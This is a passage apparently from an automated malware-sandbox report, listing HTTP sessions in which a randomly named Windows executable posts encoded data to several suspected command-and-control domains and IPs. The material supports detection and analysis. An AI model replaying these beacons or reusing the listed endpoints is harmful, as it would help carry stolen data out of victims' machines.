                                                                                                                  Oct 8, 2024 15:39:26.181380033 CEST741OUTPOST /b8ih/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Host: www.tukaari.shop
                                                                                                                  Origin: http://www.tukaari.shop
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: max-age=0
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 223
                                                                                                                  Referer: http://www.tukaari.shop/b8ih/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                  Data Raw: 6e 56 3d 44 66 62 59 39 7a 6f 46 55 4b 30 6f 33 43 41 37 77 63 63 70 4a 76 53 6e 79 48 71 36 35 31 44 61 44 4c 38 4a 31 4f 2f 31 33 76 69 78 70 75 36 4d 64 62 4c 38 76 6b 2f 51 62 38 35 62 35 6a 49 69 61 44 36 6c 35 42 39 65 76 6d 4a 72 52 74 45 56 52 51 36 56 2f 7a 66 31 59 2b 36 4b 30 48 35 57 57 51 4f 2b 30 2f 30 46 39 39 42 70 75 58 36 4d 42 6c 7a 53 52 51 4f 43 38 48 4d 37 4d 2f 4e 68 44 36 59 4a 61 65 70 7a 5a 34 79 4d 49 73 31 45 61 6e 57 34 64 78 61 75 6f 34 52 44 43 70 75 70 51 71 39 6d 4c 56 68 72 59 78 67 76 74 4d 37 70 52 37 54 55 4e 6c 36 4d 4c 57 74 69 50 35 34 61 65 49 72 32 6d 59 46 30 67 61 4a 54 67 55 73 4b 4e 45 4c 4d 50 50 6d 51 7a 4f 6e 52
                                                                                                                  Data Ascii: nV=DfbY9zoFUK0o3CA7wccpJvSnyHq651DaDL8J1O/13vixpu6MdbL8vk/Qb85b5jIiaD6l5B9evmJrRtEVRQ6V/zf1Y+6K0H5WWQO+0/0F99BpuX6MBlzSRQOC8HM7M/NhD6YJaepzZ4yMIs1EanW4dxauo4RDCpupQq9mLVhrYxgvtM7pR7TUNl6MLWtiP54aeIr2mYF0gaJTgUsKNELMPPmQzOnR


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  23192.168.2.5499983.33.130.190804568C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 8, 2024 15:39:28.729100943 CEST1758OUTPOST /b8ih/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Host: www.tukaari.shop
                                                                                                                  Origin: http://www.tukaari.shop
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: max-age=0
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 1239
                                                                                                                  Referer: http://www.tukaari.shop/b8ih/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                  Data Raw: 6e 56 3d 44 66 62 59 39 7a 6f 46 55 4b 30 6f 33 43 41 37 77 63 63 70 4a 76 53 6e 79 48 71 36 35 31 44 61 44 4c 38 4a 31 4f 2f 31 33 76 71 78 71 59 75 4d 62 35 6a 38 70 55 2f 51 59 38 35 59 35 6a 49 76 61 44 69 70 35 42 67 38 76 6c 39 72 44 65 4d 56 59 42 36 56 32 7a 66 31 46 4f 36 50 70 58 35 35 57 51 65 69 30 2f 6b 46 39 39 42 70 75 55 69 4d 49 55 7a 53 43 41 4f 4e 71 33 4d 33 61 50 4e 4e 44 36 41 2f 61 65 64 4a 5a 49 53 4d 49 4d 6c 45 64 55 2b 34 55 78 61 67 76 34 52 68 43 70 6a 72 51 71 68 45 4c 52 67 4f 59 32 4d 76 75 64 4f 4d 4a 65 7a 38 62 55 65 70 5a 55 6c 6d 66 4f 4d 76 5a 70 62 31 6d 6f 46 45 6b 34 52 41 72 6a 5a 4c 59 6e 6d 77 4d 37 6d 52 33 49 32 6a 79 79 44 4e 50 63 51 6e 36 62 6f 6c 39 49 77 45 43 61 4b 64 71 52 52 37 52 4a 30 2f 56 2b 4d 5a 68 54 55 4e 76 51 6e 71 47 77 7a 33 57 5a 47 4f 52 71 73 45 52 54 2f 77 37 6a 76 7a 6b 65 7a 32 68 73 61 4a 49 50 6e 66 4b 52 70 44 44 50 79 37 49 2f 41 55 6b 75 54 31 68 64 46 49 4e 50 41 76 77 32 62 48 51 64 74 66 44 6e 43 6d 39 54 49 4b 30 4e 55 [TRUNCATED]
                                                                                                                  Data Ascii: nV=DfbY9zoFUK0o3CA7wccpJvSnyHq651DaDL8J1O/13vqxqYuMb5j8pU/QY85Y5jIvaDip5Bg8vl9rDeMVYB6V2zf1FO6PpX55WQei0/kF99BpuUiMIUzSCAONq3M3aPNND6A/aedJZISMIMlEdU+4Uxagv4RhCpjrQqhELRgOY2MvudOMJez8bUepZUlmfOMvZpb1moFEk4RArjZLYnmwM7mR3I2jyyDNPcQn6bol9IwECaKdqRR7RJ0/V+MZhTUNvQnqGwz3WZGORqsERT/w7jvzkez2hsaJIPnfKRpDDPy7I/AUkuT1hdFINPAvw2bHQdtfDnCm9TIK0NU8ATkZbV3Ash95MSQna+r9/9lAGzUdzp64quyv07kflJA4i8+DoWYLj/3DsvjhVsYVtCG2D26Vy5rDdClswIoaM+o07BPbrvQzlqiuZ81kyspLejwEb7eVe4xbS9vsDRfnMWuRZO59AyUoVgs9bHJfh47F17oL0MGRrRn9fB7GkrdDRBHZKgIdepQMHJq3y2BN4N8rdr50XKK6fp/ytb3G1CRaEiURQuBp1X5VwPVAcYxei4RBbeZ2P7QfG2+YjLXdWQinTA9bnN6rGxNEAOSW5WzMo6IcfEOWYwv8r+3ikNX8vay2vK9wPiQcSq26rKqqUslLCgA2agltuNPZb/8UVtJ7YuQxCLyps5XllOES9ktM5eXfFSVLQN8XeDvpKZ1ewlZ9yog+cWDKdKqfGvPnbW6pfGPBAd73zucJkMNejHg9agyk/alIfUFNzPQIFHxxYjGiKdriANs+mJ5skc4YFgCOAcbQ69xoSbr0lj7+bECbLhzH3vMqed07O/e7LKD7ExfysSbTuK1McbWP/3fkDK6/fhOEc9cfXutJsigyngdM7RQDT+0hbs5f1bIgaBnhltTGAp24XqLqXCeXlNxEbpH8rdx9wj3wrlTgKvRxYoG7iLafnzUZm08TTEm+e1e/X32/ykGnjuHX/Xlhef3Hxk5OWqDTILkvT [TRUNCATED]


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  24192.168.2.5499993.33.130.190804568C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 8, 2024 15:39:31.349512100 CEST470OUTGET /b8ih/?nV=Odz4+FoaeIgH5S8BzuYjRriywjm3wUfEesAV9dDAx8uax8eIV9nl6gv+Nqhf7GxjMHuq3WRF/H9yecUAbTD81Bj6MrqplT1UHUL5zd01ssdakVPMNWHRSFmdvBITbtw3Bg==&ntHx=DVDDWR70P4Ux HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Host: www.tukaari.shop
                                                                                                                  Connection: close
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                  Oct 8, 2024 15:39:34.810785055 CEST408INHTTP/1.1 200 OK
                                                                                                                  Server: openresty
                                                                                                                  Date: Tue, 08 Oct 2024 13:39:34 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 268
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6e 56 3d 4f 64 7a 34 2b 46 6f 61 65 49 67 48 35 53 38 42 7a 75 59 6a 52 72 69 79 77 6a 6d 33 77 55 66 45 65 73 41 56 39 64 44 41 78 38 75 61 78 38 65 49 56 39 6e 6c 36 67 76 2b 4e 71 68 66 37 47 78 6a 4d 48 75 71 33 57 52 46 2f 48 39 79 65 63 55 41 62 54 44 38 31 42 6a 36 4d 72 71 70 6c 54 31 55 48 55 4c 35 7a 64 30 31 73 73 64 61 6b 56 50 4d 4e 57 48 52 53 46 6d 64 76 42 49 54 62 74 77 33 42 67 3d 3d 26 6e 74 48 78 3d 44 56 44 44 57 52 37 30 50 34 55 78 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?nV=Odz4+FoaeIgH5S8BzuYjRriywjm3wUfEesAV9dDAx8uax8eIV9nl6gv+Nqhf7GxjMHuq3WRF/H9yecUAbTD81Bj6MrqplT1UHUL5zd01ssdakVPMNWHRSFmdvBITbtw3Bg==&ntHx=DVDDWR70P4Ux"}</script></head></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  25192.168.2.550000154.212.219.2804568C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 8, 2024 15:39:40.275346994 CEST730OUTPOST /6wpo/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Host: www.prj81oqde1.buzz
                                                                                                                  Origin: http://www.prj81oqde1.buzz
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: max-age=0
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 203
                                                                                                                  Referer: http://www.prj81oqde1.buzz/6wpo/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                  Data Raw: 6e 56 3d 68 2f 69 6f 6e 62 51 57 6a 62 76 69 30 55 77 69 76 38 39 75 68 6c 4d 45 74 58 4f 75 59 4e 76 52 42 4b 6d 47 4c 53 45 6e 4e 48 76 47 2b 61 78 36 51 59 76 72 54 32 33 36 42 78 65 43 33 52 6d 64 65 71 42 75 32 53 44 57 4e 70 65 70 4e 2b 75 46 75 51 45 7a 63 42 4f 78 75 48 6e 59 30 57 44 51 77 7a 77 39 44 49 61 66 73 6c 36 73 46 6c 4d 6a 42 48 6d 51 61 77 41 43 37 6d 66 39 4b 38 41 69 6d 38 6b 50 77 78 6e 5a 79 42 57 4c 4d 30 4f 45 51 58 38 78 51 65 2b 2f 53 79 42 4d 6a 69 55 74 42 36 53 38 4f 6e 63 33 32 77 5a 55 38 2f 75 2b 44 7a 5a 78 4f 74 50 6d 50 62 57 71 6a 6b 63 65 61 49 49 76 67 79 63 3d
                                                                                                                  Data Ascii: nV=h/ionbQWjbvi0Uwiv89uhlMEtXOuYNvRBKmGLSEnNHvG+ax6QYvrT236BxeC3RmdeqBu2SDWNpepN+uFuQEzcBOxuHnY0WDQwzw9DIafsl6sFlMjBHmQawAC7mf9K8Aim8kPwxnZyBWLM0OEQX8xQe+/SyBMjiUtB6S8Onc32wZU8/u+DzZxOtPmPbWqjkceaIIvgyc=
                                                                                                                  Oct 8, 2024 15:39:41.167471886 CEST289INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx
                                                                                                                  Date: Tue, 08 Oct 2024 13:39:41 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 146
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  26192.168.2.550001154.212.219.2804568C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 8, 2024 15:39:42.835398912 CEST750OUTPOST /6wpo/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Host: www.prj81oqde1.buzz
                                                                                                                  Origin: http://www.prj81oqde1.buzz
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: max-age=0
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 223
                                                                                                                  Referer: http://www.prj81oqde1.buzz/6wpo/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                  Data Raw: 6e 56 3d 68 2f 69 6f 6e 62 51 57 6a 62 76 69 31 30 41 69 75 61 31 75 74 56 4d 4c 69 33 4f 75 4b 4e 76 64 42 4b 71 47 4c 58 38 33 4b 79 33 47 2f 36 68 36 52 61 4c 72 51 32 33 36 4b 52 65 44 34 78 6d 44 65 72 38 62 32 51 58 57 4e 71 69 70 4e 38 32 46 76 6e 59 77 64 52 4f 2f 69 6e 6e 61 70 47 44 51 77 7a 77 39 44 49 4f 35 73 6c 53 73 46 51 45 6a 41 69 4b 58 47 41 41 42 2b 6d 66 39 4f 38 41 63 6d 38 6c 59 77 30 4f 38 79 43 75 4c 4d 32 47 45 54 47 38 79 4c 4f 2b 31 50 69 41 6f 72 69 5a 4a 44 70 75 38 45 6c 5a 39 32 41 68 4d 35 4a 44 55 5a 52 52 5a 64 4e 6a 65 66 49 65 64 79 55 39 33 41 72 59 66 2b 6c 49 79 4e 48 79 62 4b 74 47 4d 38 6e 6a 79 51 57 38 4c 56 6a 44 58
                                                                                                                  Data Ascii: nV=h/ionbQWjbvi10Aiua1utVMLi3OuKNvdBKqGLX83Ky3G/6h6RaLrQ236KReD4xmDer8b2QXWNqipN82FvnYwdRO/innapGDQwzw9DIO5slSsFQEjAiKXGAAB+mf9O8Acm8lYw0O8yCuLM2GETG8yLO+1PiAoriZJDpu8ElZ92AhM5JDUZRRZdNjefIedyU93ArYf+lIyNHybKtGM8njyQW8LVjDX
                                                                                                                  Oct 8, 2024 15:39:43.739476919 CEST289INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx
                                                                                                                  Date: Tue, 08 Oct 2024 13:39:43 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 146
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  27192.168.2.550002154.212.219.2804568C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 8, 2024 15:39:45.384706974 CEST1767OUTPOST /6wpo/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Host: www.prj81oqde1.buzz
                                                                                                                  Origin: http://www.prj81oqde1.buzz
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: max-age=0
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 1239
                                                                                                                  Referer: http://www.prj81oqde1.buzz/6wpo/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                  Data Raw: 6e 56 3d 68 2f 69 6f 6e 62 51 57 6a 62 76 69 31 30 41 69 75 61 31 75 74 56 4d 4c 69 33 4f 75 4b 4e 76 64 42 4b 71 47 4c 58 38 33 4b 78 58 47 2f 4d 74 36 51 37 4c 72 52 32 33 36 48 78 65 47 34 78 6e 47 65 72 6b 66 32 51 72 47 4e 73 6d 70 4d 66 2b 46 6f 53 73 77 55 52 4f 2f 71 48 6e 62 30 57 44 67 77 33 64 32 44 49 65 35 73 6c 53 73 46 52 30 6a 57 48 6d 58 45 41 41 43 37 6d 66 68 4b 38 42 78 6d 38 73 74 77 30 4b 43 79 79 4f 4c 43 32 32 45 57 30 55 79 48 4f 2b 7a 4f 69 41 77 72 69 56 57 44 70 79 4b 45 6b 74 54 32 44 78 4d 37 4e 57 39 4c 6a 73 47 48 65 66 4a 62 72 43 34 6c 43 35 47 47 37 49 5a 36 31 59 68 51 7a 61 6c 4b 49 72 4b 33 6b 65 42 48 7a 64 61 51 31 79 32 65 30 37 4e 4f 39 4e 73 52 32 6f 6e 6e 55 67 76 49 37 50 57 64 65 74 52 39 59 5a 68 37 4e 6e 35 36 44 70 50 43 31 31 55 43 43 44 2b 73 6e 66 46 79 72 35 68 42 43 63 77 64 79 4e 56 4a 38 79 47 38 4a 31 77 4d 4c 57 51 31 70 4f 53 45 51 33 7a 7a 48 75 33 73 34 64 59 42 4a 75 59 61 7a 2f 65 47 4c 32 63 77 51 44 5a 2b 69 50 57 51 39 64 59 4c 72 78 [TRUNCATED]
                                                                                                                  Data Ascii: nV=h/ionbQWjbvi10Aiua1utVMLi3OuKNvdBKqGLX83KxXG/Mt6Q7LrR236HxeG4xnGerkf2QrGNsmpMf+FoSswURO/qHnb0WDgw3d2DIe5slSsFR0jWHmXEAAC7mfhK8Bxm8stw0KCyyOLC22EW0UyHO+zOiAwriVWDpyKEktT2DxM7NW9LjsGHefJbrC4lC5GG7IZ61YhQzalKIrK3keBHzdaQ1y2e07NO9NsR2onnUgvI7PWdetR9YZh7Nn56DpPC11UCCD+snfFyr5hBCcwdyNVJ8yG8J1wMLWQ1pOSEQ3zzHu3s4dYBJuYaz/eGL2cwQDZ+iPWQ9dYLrx1TpbywvXV78wFNr4fWY9Emz2h5ALPnj+LFvfAyq6lDBQi3klFlTqHBCtC+hFMumyG2sa5PHsAYLWpdws0G8YeQUld91H5ow/4dG/lAx7egYLlYMIr4XzU0JqidNR3ImPDOPdG6tZeBKgM7NJXtEb1QyIg6g2ODsKw0x+s4XMp5yzSY1bcHX/J5Nq94x7CJQP3XJVqyPFVSMOyLLPpukkHhLn3pj2XAgslBlzI3WgS77h+Dx0JltVB+H1FHOOnEyVH7qaLxoF72pAuwclGS6Ti5noYC/8Z9CO9HMeTxsWL+k38GaIQ7LBjFPceADKPYZOX/nCx+0jUshXF3HlUVz/VaqGs+cJmHGTJiYK05FYQgNabUbDlFtfpRMQfnTFK7A6bbgmNHzy2Xpu8TJ+gVZeDhX7BC8x4PEyoV8qfmacDx9owU8wHieGYBZCTePrecCBnvGeNZpI5WU4AvdAzXnrL9J7/6Ijo68bnFwo6G0lWy2gNkB69Ebc53g6Z9OwfXA/UY+M/mB9GEAZsocekYXZDrFs3NmPdtK4z3aG7Jj79h2eDx+GQCYn7p7tUoWx3VHpOjfmnENve3WJ9McZ4hlWIZDvW57PjNsSsgvFh7ISh9ipcszXNppVxi/JzV9ioLYOYYt3b5ryAOKBQq40JEwDn9ZgUW6VirG+n4 [TRUNCATED]
                                                                                                                  Oct 8, 2024 15:39:46.306776047 CEST289INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx
                                                                                                                  Date: Tue, 08 Oct 2024 13:39:46 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 146
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                                                                  Oct 8, 2024 15:39:46.492176056 CEST289INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx
                                                                                                                  Date: Tue, 08 Oct 2024 13:39:46 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 146
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  28192.168.2.550003154.212.219.2804568C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 8, 2024 15:39:47.928237915 CEST473OUTGET /6wpo/?nV=s9KIkrkzrqTbzkMlvbBfjAUuuxKvGdewBa6qLgEcFDzVo4ZyZuXCeDvxdW3wzkiXZ/4dwHLmTrOaI9mNhjMAeSSUnznUnGrbhm47OZW7gX2VGBRmOyGjZmEPzG32fut7kA==&ntHx=DVDDWR70P4Ux HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Host: www.prj81oqde1.buzz
                                                                                                                  Connection: close
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                  Oct 8, 2024 15:39:48.798584938 CEST289INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx
                                                                                                                  Date: Tue, 08 Oct 2024 13:39:48 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 146
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  29192.168.2.550004133.130.35.90804568C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 8, 2024 15:39:55.177587986 CEST718OUTPOST /p9u3/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Host: www.komart.shop
                                                                                                                  Origin: http://www.komart.shop
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: max-age=0
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 203
                                                                                                                  Referer: http://www.komart.shop/p9u3/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                  Data Raw: 6e 56 3d 4f 33 68 38 38 30 4a 61 6f 65 74 31 45 64 4a 4a 52 67 74 70 74 58 56 73 4e 6a 49 72 36 62 4f 67 38 4d 39 38 47 63 75 49 68 53 7a 6f 4f 54 4b 4a 49 50 6b 6a 30 36 52 6d 6c 46 33 54 65 61 71 62 51 42 4d 6d 57 56 69 6c 6b 70 78 31 55 79 4d 6c 63 4b 46 53 2f 65 77 59 71 68 6a 56 41 78 6e 50 38 42 71 2b 51 69 53 78 42 39 47 73 45 56 4b 67 59 56 38 76 31 4b 33 55 5a 50 53 54 55 57 74 63 30 35 71 43 52 4a 74 42 41 38 67 78 35 48 4a 70 4e 30 31 41 78 77 65 56 43 52 75 35 6a 53 4b 66 6b 51 64 41 55 2b 47 38 69 35 56 6f 59 73 4b 43 67 35 32 76 58 64 54 2f 47 41 47 61 46 38 72 58 58 52 30 41 4a 53 34 3d
                                                                                                                  Data Ascii: nV=O3h880Jaoet1EdJJRgtptXVsNjIr6bOg8M98GcuIhSzoOTKJIPkj06RmlF3TeaqbQBMmWVilkpx1UyMlcKFS/ewYqhjVAxnP8Bq+QiSxB9GsEVKgYV8v1K3UZPSTUWtc05qCRJtBA8gx5HJpN01AxweVCRu5jSKfkQdAU+G8i5VoYsKCg52vXdT/GAGaF8rXXR0AJS4=
                                                                                                                  Oct 8, 2024 15:39:55.957986116 CEST668INHTTP/1.1 404 Not Found
                                                                                                                  content-encoding: gzip
                                                                                                                  content-type: text/html
                                                                                                                  date: Tue, 08 Oct 2024 13:39:55 GMT
                                                                                                                  etag: W/"66fe0220-2b5"
                                                                                                                  server: nginx
                                                                                                                  vary: Accept-Encoding
